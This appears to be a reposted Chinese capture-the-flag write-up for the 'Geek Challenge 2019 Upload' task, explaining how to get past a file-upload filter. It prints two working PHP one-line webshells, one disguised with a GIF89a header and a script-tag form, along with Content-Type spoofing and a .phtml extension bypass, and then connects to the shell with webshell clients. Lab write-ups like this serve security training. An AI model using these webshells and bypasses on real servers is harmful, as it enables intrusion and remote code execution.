[极客大挑战 2019]Upload


题目打开是一个文件上次功能点

 

首次常规操作二话不说先上传一个一句话木马。

<?php @eval($_POST['123'])?>

页面提示被拦截,并显示not image

 

那我们进行抓包修改Content-Type字段进行绕过

 

 

 

发现php后缀被拦截,所以我们用畸形的后缀在进行绕过。

phtml、pht、php、php3、php4、php5

发现phtml可以正常绕过

 

 

 

发现<?被检测出来,进行拦截了,所以我们需要替换我们的一句话木马。

GIF89a? <script language="php">eval($_REQUEST[123])</script>  #替换之后的木马

然后就上次成功了

 

 

访问upload目录

http://575fd4ff-f4b4-4bf4-ab40-b71548f7b2f9.node4.buuoj.cn/upload/

 

 

然后用菜刀、蚁剑链接,链接地址

http://575fd4ff-f4b4-4bf4-ab40-b71548f7b2f9.node4.buuoj.cn/upload/shell.phtml

在根目录下找到flag

 

 

                                                                                                                                                            

 

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM